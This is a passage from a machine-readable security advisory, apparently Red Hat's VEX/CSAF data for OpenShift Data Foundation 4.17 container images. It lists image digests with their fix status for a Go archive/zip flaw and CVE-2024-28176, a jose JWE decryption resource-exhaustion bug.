"9Base-RHODF-4.17:odf4/odf-multicluster-console-rhel9@sha256:3342a17a1afca419dbfbff815261e91cdf8dcf0eecaf5a25a1713a39f3f95bf4_amd64", "9Base-RHODF-4.17:odf4/odf-multicluster-console-rhel9@sha256:df597ffd1b0d14d394e39b1d92fc90797bea5386a390450193d99f7db5bc377c_s390x", "9Base-RHODF-4.17:odf4/odf-multicluster-operator-bundle@sha256:883ba750931a93d30ff1dd3ed78592940a0079640da3d79400261f43fbecb69f_s390x", "9Base-RHODF-4.17:odf4/odf-multicluster-operator-bundle@sha256:baf554d45b1fb4b38b264145809c10c7733120104bc4d8bd9e1ecb0c428db382_ppc64le", "9Base-RHODF-4.17:odf4/odf-multicluster-operator-bundle@sha256:c05b5597918214f845c7243b7407b6cc3c88f644eec504585bd411727376b898_amd64", "9Base-RHODF-4.17:odf4/odf-multicluster-rhel9-operator@sha256:0810e85e929ad83a8593eab74a312b9c49ec94ea9833a37b7f06bca87ca9647b_ppc64le", "9Base-RHODF-4.17:odf4/odf-multicluster-rhel9-operator@sha256:54cec6c71192cc9cb6c2bbcd812a5dcccd4905d5d7e822b4012622bb235fe75c_arm64", "9Base-RHODF-4.17:odf4/odf-multicluster-rhel9-operator@sha256:66de77eb933a0fb4e0d98d2c1326212d494f6c3aa2e235f27f2a641fb31ff4af_s390x", "9Base-RHODF-4.17:odf4/odf-multicluster-rhel9-operator@sha256:941371cee3ee7dd127d5663b7e1bcb39c6565031c11fb508f07c40f37aaee4d1_amd64", "9Base-RHODF-4.17:odf4/odf-must-gather-rhel9@sha256:6978d438b80f8fd7572c792155c2f86cc6fa55ff0b8cb1d45bbe04e42d185fe3_ppc64le", "9Base-RHODF-4.17:odf4/odf-must-gather-rhel9@sha256:7c09fb5c685be2a3029d02a35417e681f3b034269d1ac3014c1c5cdd2e035e61_s390x", "9Base-RHODF-4.17:odf4/odf-must-gather-rhel9@sha256:8ccd7099f174842dab551c27a55d822cfb12d8ba26c3528f605697cbfbbf8e70_amd64", "9Base-RHODF-4.17:odf4/odf-must-gather-rhel9@sha256:d0a1a2f77001e06cdb650b857433d6eebeb53eb5337354c8a042003db80387db_arm64", "9Base-RHODF-4.17:odf4/odf-operator-bundle@sha256:01d80d9fc9cbc3f3fecab4716bde805ad97b1fbcd4942ecbb07eab9fb4714012_s390x", "9Base-RHODF-4.17:odf4/odf-operator-bundle@sha256:6e3b814a41abf41ec9cdb5d71aafc79a086fc37f2986a3fd74f75341a4af91a2_amd64", "9Base-RHODF-4.17:odf4/odf-operator-bundle@sha256:f8e5b7818849a95ca57347496baa35507ce634c645643303205309f55572db7d_ppc64le", "9Base-RHODF-4.17:odf4/odf-prometheus-operator-bundle@sha256:0d5aa39387a341a497a0cbc8d18c0e1e050e118b08243f5d8395ffe7394cc5f1_amd64", "9Base-RHODF-4.17:odf4/odf-prometheus-operator-bundle@sha256:26541764bf0b79a4cc87600d1a1981a247d7678f9a8c37af62e80f22213159a7_s390x", "9Base-RHODF-4.17:odf4/odf-prometheus-operator-bundle@sha256:75a85b98bcfa527709b8b1f16694a8bf68d5ea84a66b73baf5fea927df6e2904_ppc64le", "9Base-RHODF-4.17:odf4/odf-rhel9-operator@sha256:37af72217b81a8a7b0d968ec09a396f1840155f2a472eaa68927281f080d137f_amd64", "9Base-RHODF-4.17:odf4/odf-rhel9-operator@sha256:70ff7d9b8f6fb97fbe72768ed97519cd9e2b60dedbe1133d17fd0e317079ab3f_ppc64le", "9Base-RHODF-4.17:odf4/odf-rhel9-operator@sha256:9d7f8b892351de60609c30d187c5547ba4bec3be2dadd0e6d8ded2c4f3c1e79e_s390x", "9Base-RHODF-4.17:odf4/odf-rhel9-operator@sha256:f94cd1be8e371e8c85062be3e4475157cb628d339c1716bf96167e02703edf97_arm64", "9Base-RHODF-4.17:odf4/odr-cluster-operator-bundle@sha256:1b641a6aa2c4b1bc79ab0188c56f533fd89459be71b2b34f794faebaa66fd1f5_s390x", "9Base-RHODF-4.17:odf4/odr-cluster-operator-bundle@sha256:1e2ebbe9f71a03bfc6a0bd90f786293d9eec473ba2d570c8662a7f8d03dcc1b4_ppc64le", "9Base-RHODF-4.17:odf4/odr-cluster-operator-bundle@sha256:40d75cfa1eb657512dc4da888a5bb793a3ef3d6726665bc9ad7009cdd4166a1f_amd64", "9Base-RHODF-4.17:odf4/odr-hub-operator-bundle@sha256:22c88c1f6be208bc0a5f0053f99ea728b9e457e150b4236a04304810270f1f80_ppc64le", "9Base-RHODF-4.17:odf4/odr-hub-operator-bundle@sha256:50d04e71ae52f1a246d1509c5f2abbcb2f2bb2209090526b3357b8012b4b67d5_s390x", "9Base-RHODF-4.17:odf4/odr-hub-operator-bundle@sha256:d7e8549c1a5cabd7324c589eadf9ccebccc1abbfb69d47826baaeaebc283c6a3_amd64", "9Base-RHODF-4.17:odf4/odr-recipe-operator-bundle@sha256:0223d74679590c8a5fbd34f3d793c05ec671ecb406b2055166bd54f09f75bbda_amd64", "9Base-RHODF-4.17:odf4/odr-recipe-operator-bundle@sha256:137a8a07adae2c0bb5fd1ac2a5823ffd85abe1035512a04e112e55b0aa3dc163_ppc64le", "9Base-RHODF-4.17:odf4/odr-recipe-operator-bundle@sha256:987ed8aa1347a831f61a4d65011f5bd00a700c65f6e7fa669ff3f38131425705_s390x", "9Base-RHODF-4.17:odf4/odr-rhel9-operator@sha256:2f414dc954bca2cd17f0bbabea11a8f18437eb417c6266d8c4750ba96957fc87_amd64", "9Base-RHODF-4.17:odf4/odr-rhel9-operator@sha256:bf140f64657478a7f94bacd6784f7b7727d5df9ae8eb4c526f86d5533bff06ae_arm64", "9Base-RHODF-4.17:odf4/odr-rhel9-operator@sha256:d9c38fe43617f214fea848ef7124d77f30358e2049390fc3bd3526986ff9ebbb_s390x", "9Base-RHODF-4.17:odf4/odr-rhel9-operator@sha256:fc251ea3c441bd0d3e358969fb6730bb9e53e340da9eff8bb6a173a37116c943_ppc64le", "9Base-RHODF-4.17:odf4/rook-ceph-operator-bundle@sha256:1055afb10a6ce469d2c77337878f510b29375a830f14505042da8a6d6081c438_amd64", "9Base-RHODF-4.17:odf4/rook-ceph-operator-bundle@sha256:5df96c3b3dc8cdad2c8b42fd9378dc55779cdb11f64eea5fa653101505d4d497_s390x", "9Base-RHODF-4.17:odf4/rook-ceph-operator-bundle@sha256:7cb791603d9d7c8c1c8e5200f96401ad0fadc5db14ad698e7a9519d046d0fdd0_ppc64le", "9Base-RHODF-4.17:odf4/rook-ceph-rhel9-operator@sha256:7488149277a76efe188086d283fa2acf732a4eca8bdeaa4de8744204876a77a2_amd64", "9Base-RHODF-4.17:odf4/rook-ceph-rhel9-operator@sha256:b89943771e55457bd3765efd5f3e6e6697953ee9e5c7bd123921a274b79536d3_ppc64le", "9Base-RHODF-4.17:odf4/rook-ceph-rhel9-operator@sha256:cf89aaa1ad0614707748c0ab0b26ee40855053b0f4932cd5edaa8ccf8b1470e7_s390x", ], }, ], threats: [ { category: "impact", details: "Moderate", }, ], title: "golang: archive/zip: Incorrect handling of certain ZIP files", }, { cve: "CVE-2024-28176", cwe: { id: "CWE-400", name: "Uncontrolled Resource Consumption", }, discovery_date: "2024-03-10T00:00:00+00:00", flags: [ { label: "vulnerable_code_not_present", product_ids: [ "9Base-RHODF-4.17:odf4/cephcsi-operator-bundle@sha256:2b9e511b21d4fefe8450f014962f2450db3e64af07f5e6e4bbfdaafafdfdc1f4_ppc64le", "9Base-RHODF-4.17:odf4/cephcsi-operator-bundle@sha256:9a822fddffde8f67711c5025a89e003341011e0b8145cfd5b840849cabbe68a0_amd64", "9Base-RHODF-4.17:odf4/cephcsi-operator-bundle@sha256:e35426de9ea6419f4981d8c6861867fc3eadcde4e41757b9a8f1ed4f2fa00dc9_s390x", "9Base-RHODF-4.17:odf4/cephcsi-rhel9-operator@sha256:78656a47235af49c9a7bc75d9729987edf39a77077a3f478f5b46658df18878a_amd64", "9Base-RHODF-4.17:odf4/cephcsi-rhel9-operator@sha256:92544e943e160d8fce1a9710a9d67ca4ccb795ff846edf7717d1e52835899202_ppc64le", "9Base-RHODF-4.17:odf4/cephcsi-rhel9-operator@sha256:9615793800efca765c5ae588e0547e4e18bdfe264c8a92303fbbc39276c74580_s390x", "9Base-RHODF-4.17:odf4/cephcsi-rhel9-operator@sha256:d6e30344ec1d541b6791b0e58cb48f4f3f492069ff8392005e8d1f16350c80e2_arm64", "9Base-RHODF-4.17:odf4/cephcsi-rhel9@sha256:7bc24afafec3a0896c887d7eeeca47eb6f0cb12e35c62aa212ce55210cb1512d_amd64", "9Base-RHODF-4.17:odf4/cephcsi-rhel9@sha256:93b238c24a3623bd635e162caa9a30ad7158db25eb83b545e9b365db0f769161_ppc64le", "9Base-RHODF-4.17:odf4/cephcsi-rhel9@sha256:fb6507b95b53b19d90b82c3ac2a3b0264ebbdb9d4a8ceff3006e8a446a1cef49_s390x", "9Base-RHODF-4.17:odf4/mcg-core-rhel9@sha256:22b568f083c7563ffbb8d23807837a0f78cedeb156cffe9110906f3b6e0c70fb_arm64", "9Base-RHODF-4.17:odf4/mcg-core-rhel9@sha256:50f66564131a5b2b695582956c80515d7eea64d1c009479665937c97a76e2348_ppc64le", "9Base-RHODF-4.17:odf4/mcg-core-rhel9@sha256:a27c28ecf714cc248323a35eb58daec2aa611a318f0e61eb0defe0eaa80eb2f4_amd64", "9Base-RHODF-4.17:odf4/mcg-core-rhel9@sha256:bee14d945af0620ad1666e67be750324a1814cbf573256c1c88521e18f9877f7_s390x", "9Base-RHODF-4.17:odf4/mcg-operator-bundle@sha256:71b79ea2f0356740a0e53e89a0422f8da608dd43337dd07dfcbadc9f9d8a8884_amd64", "9Base-RHODF-4.17:odf4/mcg-operator-bundle@sha256:729fdaad48dfca53af4b3bf9bbf3cbf9dd25d5c50ddcbac03d0e8738aeb997cc_s390x", "9Base-RHODF-4.17:odf4/mcg-operator-bundle@sha256:ed0d44fd0215cd299b4929617fa1f05ea31c6ee3cc078fbf6cc884e02a59beee_ppc64le", "9Base-RHODF-4.17:odf4/mcg-rhel9-operator@sha256:1d189e8c4dfcc998d5887e1c5f06e874fa0beed29bc8f87f279299d58124a505_arm64", "9Base-RHODF-4.17:odf4/mcg-rhel9-operator@sha256:5f92812a17a6637280387a3033865d8bd13ee8d6506f8e17489cefb79c53f58e_amd64", "9Base-RHODF-4.17:odf4/mcg-rhel9-operator@sha256:7eba9da5ba5071b411bc99d33eee04e3f4530516ad984524920de542629e9b55_ppc64le", "9Base-RHODF-4.17:odf4/mcg-rhel9-operator@sha256:f8c6007e32c54ffe0597952ae6eb1d38435188d605f3995ec785dff43da4257d_s390x", "9Base-RHODF-4.17:odf4/ocs-client-console-rhel9@sha256:824823d527bdbbdd2abb773e054c12b41243e15467ada76689af4fdd6fae894a_s390x", "9Base-RHODF-4.17:odf4/ocs-client-console-rhel9@sha256:9521eae22f7669dea4b31841d7cfe11e5d92155b11785afb2977cea9c5d917dc_ppc64le", "9Base-RHODF-4.17:odf4/ocs-client-console-rhel9@sha256:a94961fd2c5aea06922c9c365c3a6296abf073e09a520f190a45f687cabc7b1d_amd64", "9Base-RHODF-4.17:odf4/ocs-client-operator-bundle@sha256:26503c487a93ad520e1953ccad9200be808bc93648db90eaba3a73a340483541_ppc64le", "9Base-RHODF-4.17:odf4/ocs-client-operator-bundle@sha256:78f3e869e50bd0e69d8e6efc6e6de357aadcc06ac3659d6ec7a053cda11be88b_amd64", "9Base-RHODF-4.17:odf4/ocs-client-operator-bundle@sha256:fb473ae152002d124ff662e94ca9bf68f8f6a4c61c40d4f2929a55ef1c25cd20_s390x", "9Base-RHODF-4.17:odf4/ocs-client-rhel9-operator@sha256:0bb022ca33965fb0f9de7df36f15377a33c90d873050dcbd763370ac1f06295a_s390x", "9Base-RHODF-4.17:odf4/ocs-client-rhel9-operator@sha256:1070f8191e3ead7781876ed4d84ac5c5eeb54a1fa4d2c40701ebf393d345111c_ppc64le", "9Base-RHODF-4.17:odf4/ocs-client-rhel9-operator@sha256:8dbdc5fb2b8d4551e5896f65654b3dae8a5164c12b1e1ec6d7fdda348a7b8c7d_arm64", "9Base-RHODF-4.17:odf4/ocs-client-rhel9-operator@sha256:e7afe93fc1d88c385edc3d8ab3173e7bfb4a4f890d371836d5d2f72a2eb4abb5_amd64", "9Base-RHODF-4.17:odf4/ocs-metrics-exporter-rhel9@sha256:147c2497071460ba266fc5ef0768d82edb6be9d7ffaa0c514e49308cf8017e7a_ppc64le", "9Base-RHODF-4.17:odf4/ocs-metrics-exporter-rhel9@sha256:28fd2ef06dbf379ad4204877a3492933a731f2bc1d6dd7fc1600f52a3dc3ca47_amd64", "9Base-RHODF-4.17:odf4/ocs-metrics-exporter-rhel9@sha256:6616912ec376e6993346b38bf637eb47d7a00aa9f58120899470c8353be02a0e_s390x", "9Base-RHODF-4.17:odf4/ocs-operator-bundle@sha256:60f6533b7262bbfad59c5e14dff71878d3ea501c3b46194155ce53bc43a119e4_amd64", "9Base-RHODF-4.17:odf4/ocs-operator-bundle@sha256:664c467321c9a5c3fec9d4fd85e16ab50677684b480cd1f346638f794ee7357c_s390x", "9Base-RHODF-4.17:odf4/ocs-operator-bundle@sha256:b14752e1e9e6b004429f3c36dbaf4ec4d36d22ab9ac84c2d5158e8fbdfb214dd_ppc64le", "9Base-RHODF-4.17:odf4/ocs-rhel9-operator@sha256:3472c7c043b318c2569e8a900527b13d052f1860082dba13723514795cedeec0_ppc64le", "9Base-RHODF-4.17:odf4/ocs-rhel9-operator@sha256:54828ef99fc8d8fa3801c2ea0338a56f382018e4ae1a800dcd328fe43f7149be_arm64", "9Base-RHODF-4.17:odf4/ocs-rhel9-operator@sha256:54a164ce15d25597fa3939709acbe467f728ce4f4165771a685fc507edfb92a3_s390x", "9Base-RHODF-4.17:odf4/ocs-rhel9-operator@sha256:cfa36a55dc542e3e1332a55a59588a753f80e32d905847e51efdd1478fd58f0b_amd64", "9Base-RHODF-4.17:odf4/odf-cli-rhel9@sha256:0e2a71ed4eaa44f786428e18e01d90d3b0384169c78c5654e2ebbaac3a5ee2a4_ppc64le", "9Base-RHODF-4.17:odf4/odf-cli-rhel9@sha256:8046b84915034f60a5e5e349b001f04b713b3aa71ced136390c5086e0c351dd4_amd64", "9Base-RHODF-4.17:odf4/odf-cli-rhel9@sha256:9cbf21dad9ed5738ae1feb112707af3e74e02784795addf07ee4228bbd22e932_s390x", "9Base-RHODF-4.17:odf4/odf-cli-rhel9@sha256:a42d48b82e34f1f7cb731c3bdd25e81dc5ff3a61a3ca0b8b5eecefb5e2218be0_arm64", "9Base-RHODF-4.17:odf4/odf-console-rhel9@sha256:89cc7f0d6adb957e0f3adbdb2c023d4a6dda89e388a94d0b4015e0853971075e_ppc64le", "9Base-RHODF-4.17:odf4/odf-console-rhel9@sha256:917e625bfea670e543f857cf7cea31380b76ceac862bee61cc490cebabd23081_amd64", "9Base-RHODF-4.17:odf4/odf-console-rhel9@sha256:b1ba270980579090845909bb4f1e8a7b98ce8816c7c5ea60903432d138d29310_s390x", "9Base-RHODF-4.17:odf4/odf-cosi-sidecar-rhel9@sha256:2be1d5ad630b9e91f30e0c82cfee52231d095cee87908949170e40a39f4ed814_ppc64le", "9Base-RHODF-4.17:odf4/odf-cosi-sidecar-rhel9@sha256:37ec39720b1ce9701630635f158ad20414b1cda335b15b11526a7838ed189a54_s390x", "9Base-RHODF-4.17:odf4/odf-cosi-sidecar-rhel9@sha256:7c59771279f5227246a941925160ca2f9fc169bd13972ab68a476e62308707e1_amd64", "9Base-RHODF-4.17:odf4/odf-csi-addons-operator-bundle@sha256:328ddae72c795012c7671c214d9a84d539264f8fe855d1a9e2dbb74590e72076_s390x", "9Base-RHODF-4.17:odf4/odf-csi-addons-operator-bundle@sha256:99d8b3aedcc57f57716bba144b991f7f223cdcc47ec37903c85aa20df295b3d4_amd64", "9Base-RHODF-4.17:odf4/odf-csi-addons-operator-bundle@sha256:f3f28074884a29b5d28f4535af6489f1ca8326dd60689c4bc8c862277dcb6e22_ppc64le", "9Base-RHODF-4.17:odf4/odf-csi-addons-rhel9-operator@sha256:12e2b71cea2c63fb14363334287f5affa4ff3dc84f24dd51b5f57ba6a751c2da_amd64", "9Base-RHODF-4.17:odf4/odf-csi-addons-rhel9-operator@sha256:7fa969e6714e0c3851f30999df5c823cd5738f28e1b2f6c06d940541c6edad4e_s390x", "9Base-RHODF-4.17:odf4/odf-csi-addons-rhel9-operator@sha256:a0ac08a8a3ee9155338182d47bf55595a78aec3811c70f3fedb2ed461aad3319_arm64", "9Base-RHODF-4.17:odf4/odf-csi-addons-rhel9-operator@sha256:b96b09407708601d04abb6a90d16f6f1260839534d64238b6aa4c7a5f458a6a4_ppc64le", "9Base-RHODF-4.17:odf4/odf-csi-addons-sidecar-rhel9@sha256:02e65965166ec9794f11b663de59671f159f8b2fef4d56ee5589b26bef342168_s390x", "9Base-RHODF-4.17:odf4/odf-csi-addons-sidecar-rhel9@sha256:322bae96941ede565a681ad98fc287f442f36888e0ed2b5ec4b309c702c7488b_amd64", "9Base-RHODF-4.17:odf4/odf-csi-addons-sidecar-rhel9@sha256:6e44cf5a814ceb7fea6ef925f6381a279837ebe2baf2980f4937e0c752afa5e2_arm64", "9Base-RHODF-4.17:odf4/odf-csi-addons-sidecar-rhel9@sha256:7a206b9fe0e540674fc9ec97b338607e61b8bfd3bfe30855835d0a940ca9304c_ppc64le", "9Base-RHODF-4.17:odf4/odf-multicluster-console-rhel9@sha256:25052271f038b691ef973ac5a9fc02eee015a0427e087a5a390f1e31f7823d79_ppc64le", "9Base-RHODF-4.17:odf4/odf-multicluster-console-rhel9@sha256:3342a17a1afca419dbfbff815261e91cdf8dcf0eecaf5a25a1713a39f3f95bf4_amd64", "9Base-RHODF-4.17:odf4/odf-multicluster-console-rhel9@sha256:df597ffd1b0d14d394e39b1d92fc90797bea5386a390450193d99f7db5bc377c_s390x", "9Base-RHODF-4.17:odf4/odf-multicluster-operator-bundle@sha256:883ba750931a93d30ff1dd3ed78592940a0079640da3d79400261f43fbecb69f_s390x", "9Base-RHODF-4.17:odf4/odf-multicluster-operator-bundle@sha256:baf554d45b1fb4b38b264145809c10c7733120104bc4d8bd9e1ecb0c428db382_ppc64le", "9Base-RHODF-4.17:odf4/odf-multicluster-operator-bundle@sha256:c05b5597918214f845c7243b7407b6cc3c88f644eec504585bd411727376b898_amd64", "9Base-RHODF-4.17:odf4/odf-must-gather-rhel9@sha256:6978d438b80f8fd7572c792155c2f86cc6fa55ff0b8cb1d45bbe04e42d185fe3_ppc64le", "9Base-RHODF-4.17:odf4/odf-must-gather-rhel9@sha256:7c09fb5c685be2a3029d02a35417e681f3b034269d1ac3014c1c5cdd2e035e61_s390x", "9Base-RHODF-4.17:odf4/odf-must-gather-rhel9@sha256:8ccd7099f174842dab551c27a55d822cfb12d8ba26c3528f605697cbfbbf8e70_amd64", "9Base-RHODF-4.17:odf4/odf-must-gather-rhel9@sha256:d0a1a2f77001e06cdb650b857433d6eebeb53eb5337354c8a042003db80387db_arm64", "9Base-RHODF-4.17:odf4/odf-operator-bundle@sha256:01d80d9fc9cbc3f3fecab4716bde805ad97b1fbcd4942ecbb07eab9fb4714012_s390x", "9Base-RHODF-4.17:odf4/odf-operator-bundle@sha256:6e3b814a41abf41ec9cdb5d71aafc79a086fc37f2986a3fd74f75341a4af91a2_amd64", "9Base-RHODF-4.17:odf4/odf-operator-bundle@sha256:f8e5b7818849a95ca57347496baa35507ce634c645643303205309f55572db7d_ppc64le", "9Base-RHODF-4.17:odf4/odf-prometheus-operator-bundle@sha256:0d5aa39387a341a497a0cbc8d18c0e1e050e118b08243f5d8395ffe7394cc5f1_amd64", "9Base-RHODF-4.17:odf4/odf-prometheus-operator-bundle@sha256:26541764bf0b79a4cc87600d1a1981a247d7678f9a8c37af62e80f22213159a7_s390x", "9Base-RHODF-4.17:odf4/odf-prometheus-operator-bundle@sha256:75a85b98bcfa527709b8b1f16694a8bf68d5ea84a66b73baf5fea927df6e2904_ppc64le", "9Base-RHODF-4.17:odf4/odf-rhel9-operator@sha256:37af72217b81a8a7b0d968ec09a396f1840155f2a472eaa68927281f080d137f_amd64", "9Base-RHODF-4.17:odf4/odf-rhel9-operator@sha256:70ff7d9b8f6fb97fbe72768ed97519cd9e2b60dedbe1133d17fd0e317079ab3f_ppc64le", "9Base-RHODF-4.17:odf4/odf-rhel9-operator@sha256:9d7f8b892351de60609c30d187c5547ba4bec3be2dadd0e6d8ded2c4f3c1e79e_s390x", "9Base-RHODF-4.17:odf4/odf-rhel9-operator@sha256:f94cd1be8e371e8c85062be3e4475157cb628d339c1716bf96167e02703edf97_arm64", "9Base-RHODF-4.17:odf4/odr-cluster-operator-bundle@sha256:1b641a6aa2c4b1bc79ab0188c56f533fd89459be71b2b34f794faebaa66fd1f5_s390x", "9Base-RHODF-4.17:odf4/odr-cluster-operator-bundle@sha256:1e2ebbe9f71a03bfc6a0bd90f786293d9eec473ba2d570c8662a7f8d03dcc1b4_ppc64le", "9Base-RHODF-4.17:odf4/odr-cluster-operator-bundle@sha256:40d75cfa1eb657512dc4da888a5bb793a3ef3d6726665bc9ad7009cdd4166a1f_amd64", "9Base-RHODF-4.17:odf4/odr-hub-operator-bundle@sha256:22c88c1f6be208bc0a5f0053f99ea728b9e457e150b4236a04304810270f1f80_ppc64le", "9Base-RHODF-4.17:odf4/odr-hub-operator-bundle@sha256:50d04e71ae52f1a246d1509c5f2abbcb2f2bb2209090526b3357b8012b4b67d5_s390x", "9Base-RHODF-4.17:odf4/odr-hub-operator-bundle@sha256:d7e8549c1a5cabd7324c589eadf9ccebccc1abbfb69d47826baaeaebc283c6a3_amd64", "9Base-RHODF-4.17:odf4/odr-recipe-operator-bundle@sha256:0223d74679590c8a5fbd34f3d793c05ec671ecb406b2055166bd54f09f75bbda_amd64", "9Base-RHODF-4.17:odf4/odr-recipe-operator-bundle@sha256:137a8a07adae2c0bb5fd1ac2a5823ffd85abe1035512a04e112e55b0aa3dc163_ppc64le", "9Base-RHODF-4.17:odf4/odr-recipe-operator-bundle@sha256:987ed8aa1347a831f61a4d65011f5bd00a700c65f6e7fa669ff3f38131425705_s390x", "9Base-RHODF-4.17:odf4/odr-rhel9-operator@sha256:2f414dc954bca2cd17f0bbabea11a8f18437eb417c6266d8c4750ba96957fc87_amd64", "9Base-RHODF-4.17:odf4/odr-rhel9-operator@sha256:bf140f64657478a7f94bacd6784f7b7727d5df9ae8eb4c526f86d5533bff06ae_arm64", "9Base-RHODF-4.17:odf4/odr-rhel9-operator@sha256:d9c38fe43617f214fea848ef7124d77f30358e2049390fc3bd3526986ff9ebbb_s390x", "9Base-RHODF-4.17:odf4/odr-rhel9-operator@sha256:fc251ea3c441bd0d3e358969fb6730bb9e53e340da9eff8bb6a173a37116c943_ppc64le", "9Base-RHODF-4.17:odf4/rook-ceph-operator-bundle@sha256:1055afb10a6ce469d2c77337878f510b29375a830f14505042da8a6d6081c438_amd64", "9Base-RHODF-4.17:odf4/rook-ceph-operator-bundle@sha256:5df96c3b3dc8cdad2c8b42fd9378dc55779cdb11f64eea5fa653101505d4d497_s390x", "9Base-RHODF-4.17:odf4/rook-ceph-operator-bundle@sha256:7cb791603d9d7c8c1c8e5200f96401ad0fadc5db14ad698e7a9519d046d0fdd0_ppc64le", "9Base-RHODF-4.17:odf4/rook-ceph-rhel9-operator@sha256:7488149277a76efe188086d283fa2acf732a4eca8bdeaa4de8744204876a77a2_amd64", "9Base-RHODF-4.17:odf4/rook-ceph-rhel9-operator@sha256:b89943771e55457bd3765efd5f3e6e6697953ee9e5c7bd123921a274b79536d3_ppc64le", "9Base-RHODF-4.17:odf4/rook-ceph-rhel9-operator@sha256:cf89aaa1ad0614707748c0ab0b26ee40855053b0f4932cd5edaa8ccf8b1470e7_s390x", ], }, ], ids: [ { system_name: "Red Hat Bugzilla ID", text: "2268820", }, ], notes: [ { category: "description", text: "Jose was found to have an uncontrolled resource consumption vulnerability. Under certain conditions, the user's environment can consume an unreasonable amount of CPU time or memory during JWE decryption operations, leading to a denial of service.", title: "Vulnerability description", }, { category: "summary", text: "jose: resource exhaustion", title: "Vulnerability summary", }, { category: "general", text: "The CVSS score(s) listed for this vulnerability do not reflect the associated product's status, and are included for informational purposes to better understand the severity of this vulnerability.", title: "CVSS score applicability", }, ], product_status: { fixed: [ "9Base-RHODF-4.17:odf4/odf-multicluster-rhel9-operator@sha256:0810e85e929ad83a8593eab74a312b9c49ec94ea9833a37b7f06bca87ca9647b_ppc64le", "9Base-RHODF-4.17:odf4/odf-multicluster-rhel9-operator@sha256:54cec6c71192cc9cb6c2bbcd812a5dcccd4905d5d7e822b4012622bb235fe75c_arm64", "9Base-RHODF-4.17:odf4/odf-multicluster-rhel9-operator@sha256:66de77eb933a0fb4e0d98d2c1326212d494f6c3aa2e235f27f2a641fb31ff4af_s390x", "9Base-RHODF-4.17:odf4/odf-multicluster-rhel9-operator@sha256:941371cee3ee7dd127d5663b7e1bcb39c6565031c11fb508f07c40f37aaee4d1_amd64", ], known_not_affected: [ "9Base-RHODF-4.17:odf4/cephcsi-operator-bundle@sha256:2b9e511b21d4fefe8450f014962f2450db3e64af07f5e6e4bbfdaafafdfdc1f4_ppc64le", "9Base-RHODF-4.17:odf4/cephcsi-operator-bundle@sha256:9a822fddffde8f67711c5025a89e003341011e0b8145cfd5b840849cabbe68a0_amd64", "9Base-RHODF-4.17:odf4/cephcsi-operator-bundle@sha256:e35426de9ea6419f4981d8c6861867fc3eadcde4e41757b9a8f1ed4f2fa00dc9_s390x", "9Base-RHODF-4.17:odf4/cephcsi-rhel9-operator@sha256:78656a47235af49c9a7bc75d9729987edf39a77077a3f478f5b46658df18878a_amd64", "9Base-RHODF-4.17:odf4/cephcsi-rhel9-operator@sha256:92544e943e160d8fce1a9710a9d67ca4ccb795ff846edf7717d1e52835899202_ppc64le", "9Base-RHODF-4.17:odf4/cephcsi-rhel9-operator@sha256:9615793800efca765c5ae588e0547e4e18bdfe264c8a92303fbbc39276c74580_s390x", "9Base-RHODF-4.17:odf4/cephcsi-rhel9-operator@sha256:d6e30344ec1d541b6791b0e58cb48f4f3f492069ff8392005e8d1f16350c80e2_arm64", "9Base-RHODF-4.17:odf4/cephcsi-rhel9@sha256:7bc24afafec3a0896c887d7eeeca47eb6f0cb12e35c62aa212ce55210cb1512d_amd64", "9Base-RHODF-4.17:odf4/cephcsi-rhel9@sha256:93b238c24a3623bd635e162caa9a30ad7158db25eb83b545e9b365db0f769161_ppc64le", "9Base-RHODF-4.17:odf4/cephcsi-rhel9@sha256:fb6507b95b53b19d90b82c3ac2a3b0264ebbdb9d4a8ceff3006e8a446a1cef49_s390x", "9Base-RHODF-4.17:odf4/mcg-core-rhel9@sha256:22b568f083c7563ffbb8d23807837a0f78cedeb156cffe9110906f3b6e0c70fb_arm64", "9Base-RHODF-4.17:odf4/mcg-core-rhel9@sha256:50f66564131a5b2b695582956c80515d7eea64d1c009479665937c97a76e2348_ppc64le", "9Base-RHODF-4.17:odf4/mcg-core-rhel9@sha256:a27c28ecf714cc248323a35eb58daec2aa611a318f0e61eb0defe0eaa80eb2f4_amd64", "9Base-RHODF-4.17:odf4/mcg-core-rhel9@sha256:bee14d945af0620ad1666e67be750324a1814cbf573256c1c88521e18f9877f7_s390x", "9Base-RHODF-4.17:odf4/mcg-operator-bundle@sha256:71b79ea2f0356740a0e53e89a0422f8da608dd43337dd07dfcbadc9f9d8a8884_amd64", "9Base-RHODF-4.17:odf4/mcg-operator-bundle@sha256:729fdaad48dfca53af4b3bf9bbf3cbf9dd25d5c50ddcbac03d0e8738aeb997cc_s390x", "9Base-RHODF-4.17:odf4/mcg-operator-bundle@sha256:ed0d44fd0215cd299b4929617fa1f05ea31c6ee3cc078fbf6cc884e02a59beee_ppc64le", "9Base-RHODF-4.17:odf4/mcg-rhel9-operator@sha256:1d189e8c4dfcc998d5887e1c5f06e874fa0beed29bc8f87f279299d58124a505_arm64", "9Base-RHODF-4.17:odf4/mcg-rhel9-operator@sha256:5f92812a17a6637280387a3033865d8bd13ee8d6506f8e17489cefb79c53f58e_amd64", "9Base-RHODF-4.17:odf4/mcg-rhel9-operator@sha256:7eba9da5ba5071b411bc99d33eee04e3f4530516ad984524920de542629e9b55_ppc64le", "9Base-RHODF-4.17:odf4/mcg-rhel9-operator@sha256:f8c6007e32c54ffe0597952ae6eb1d38435188d605f3995ec785dff43da4257d_s390x", "9Base-RHODF-4.17:odf4/ocs-client-console-rhel9@sha256:824823d527bdbbdd2abb773e054c12b41243e15467ada76689af4fdd6fae894a_s390x", "9Base-RHODF-4.17:odf4/ocs-client-console-rhel9@sha256:9521eae22f7669dea4b31841d7cfe11e5d92155b11785afb2977cea9c5d917dc_ppc64le", "9Base-RHODF-4.17:odf4/ocs-client-console-rhel9@sha256:a94961fd2c5aea06922c9c365c3a6296abf073e09a520f190a45f687cabc7b1d_amd64", "9Base-RHODF-4.17:odf4/ocs-client-operator-bundle@sha256:26503c487a93ad520e1953ccad9200be808bc93648db90eaba3a73a340483541_ppc64le", "9Base-RHODF-4.17:odf4/ocs-client-operator-bundle@sha256:78f3e869e50bd0e69d8e6efc6e6de357aadcc06ac3659d6ec7a053cda11be88b_amd64", "9Base-RHODF-4.17:odf4/ocs-client-operator-bundle@sha256:fb473ae152002d124ff662e94ca9bf68f8f6a4c61c40d4f2929a55ef1c25cd20_s390x", "9Base-RHODF-4.17:odf4/ocs-client-rhel9-operator@sha256:0bb022ca33965fb0f9de7df36f15377a33c90d873050dcbd763370ac1f06295a_s390x", 